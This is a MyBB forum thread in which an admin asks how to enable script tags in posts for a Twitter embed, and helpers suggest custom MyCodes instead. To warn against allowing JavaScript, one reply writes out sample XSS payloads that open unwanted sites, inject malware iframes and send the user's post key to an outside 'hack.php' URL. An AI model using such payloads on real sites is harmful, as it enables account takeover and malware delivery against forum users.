How do I enable script tags in posts?
<script blah blah, etc, etc...> (that's just a made up example)
Anything that uses script tags seems to just show up as plain text. How do I force it to function as it is intended? On other forums it works by default, but I can't seem to figure out how to get them to work on mybb.
Thanks!
You would need to edit core files, but you may as well just ask people to hack your forum and spam you with infinite alert boxes, log you out, steal your post keys, embed malicious iframes into your pages, and perform all kinds of XSS attacks on you if you allow people to post script tags. I'd be curious to see what forums you've used that allow people to put arbitrary javascript in posts, it's an incredibly huge security risk.
The code a user is asking me about is a twitter feed embed that requires a script code in order to display properly. I've seen them displayed on many other forums in the past, and I know it's not uncommon for people on forums to include tweets or twitter feeds in posts or in signatures on the web. Is there not a way to enable only select ones, perhaps? I don't think twitter would provide the code with a script requirement if no forums allowed it.
Putting it in your templates, sure. Putting it in a post, no. I can assure you Twitter's first priority when it comes to providing code won't be whether it's able to be embedded into posts on forums. You can't just 'allow' Twitter because you'd need to allow script tags in general. Like I say, do you have an example of a site where people can embed script tags into posts? I mean you might be able to create a custom MyCode for it, but not embed the code straight in.
I know for a fact various free boards have allowed this, but I haven't used the forums in question in some time. It's possible they no longer do. I'm pretty sure a free board called Excoboard allowed them when I last used them, and they also allowed the "hide" code such as this...
<!-- everything here is hidden in the post -->
^which also doesn't work on MyBB.
I wasn't aware script codes in general would open up such risks, though, so it's quite possible Excoboard and whatever other forums have done so in the past were just inferior. Thank you for bringing that to my attention. What about the <!-- hide --> code, though? Is there a way to enable that without opening up risks?
<!-- --> is a HTML comment and it's remarkable that was allowed to be used as well. It sounds like it just had incredibly poor security rather than specifically allowing these things to be used. MyBB has an option to allow HTML in posts, but I think even that stops script tags being used. As for malicious javascript...
window.open('http://somepornsite.com');
jQuery('body').append('</iframe>', {'src':'http://somepornsite.com'});
jQuery('body').append('</iframe>', {'src':'http://somemalwaresite.com'});
jQuery('body').append('</img>', {'src':'http://mysite.com/hack.php?key='+my_post_key});
If this was allowed, I'd have just opened a new window to a porn site, embeded an iframe loading porn, malware, whatever, and I also just stole your post security key allowing me to make actions on your behalf.
Don't allow javascript on your forum
You are correct HTML enabled still disables the codes in question. I have had HTML turned on on my forum for a while.
The reason I ask about the hide code is because we are a roleplaying site and we have a section where we play a game where we try to "trick" other users by hiding certain words and seeing if the person can find them. Sometimes we will hide a word in our sig, or even drawn into an avatar we upload, and the other user has to find and identify them. I think it would be interesting if we could "hide" words right in a post that do not show up when you highlight the whole page. Do you have any ideas that might allow this type of thing but not pose a risk? So far, the closest we have is using the "transparent" font color but when you highlight the whole page, the text shows up and the users already know that trick. lol
As for the Twitter thing, I'll just skip that for now. It was just one user who asked anyway, and I'm not really that familiar with twitter myself so I'd rather not risk trying to do it through MyCodes.
I see, well MyCodes are designed to allow HTML to be used safely, so you could create a MyCode to do this. Go to Admin CP > Configuration > MyCode > Add New MyCode, and use the following for the regular expression and replacement respectively:
\[hide\](.*?)\[/hide\]
<span style="display: none;">$1</span>
Then when you use:
Testing [hide]hello![/hide] the MyCode
This would show as:
Testing the MyCode
However, even with MyCodes, creating one for script tags would still be somewhat risky, but I can have a look at it if you want... was it basically just the tweet feed embed?
Ah, yes I think that would work for the hide code! Very nice! Thank you for the idea!
As for the tweet, here is the code the user sent me and was trying to get to work...
<blockquote class="twitter-tweet" lang="en"><p>It's game time baby! Everything that you know changes tonight. You ready? <a href="https://twitter.com/hashtag/XWF?src=hash">#XWF</a> <a href="https://twitter.com/hashtag/GameTime?src=hash">#GameTime</a></p>— Kristen Silver (@KristenSilver7) <a href="https://twitter.com/KristenSilver7/statuses/503236344249085952">August 23, 2014</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
Some of that is obviously personalized to that user but as you can see it needs the script widget code at the bottom in order to display her tweet. If you have an easy fix, that would be awesome.
Hmm ok, well it would depend on whether or not you still have/want to keep HTML enabled on your forum. If you allow HTML, then I guess they could post the HTML part, and then for the script bit, add in another MyCode, with these for the regular expression and replacement:
\[twitterwidget\]
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
So they they would basically post this:
<blockquote class="twitter-tweet" lang="en"><p>It's game time baby! Everything that you know changes tonight. You ready? <a href="https://twitter.com/hashtag/XWF?src=hash">#XWF</a> <a href="https://twitter.com/hashtag/GameTime?src=hash">#GameTime</a></p>— Kristen Silver (@KristenSilver7) <a href="https://twitter.com/KristenSilver7/statuses/503236344249085952">August 23, 2014</a></blockquote>
[twitterwidget]
I didn't initially realise the
replacement allowed script tags, but I guess that would be okay as it'd be set up by the admin... so maybe see if that works?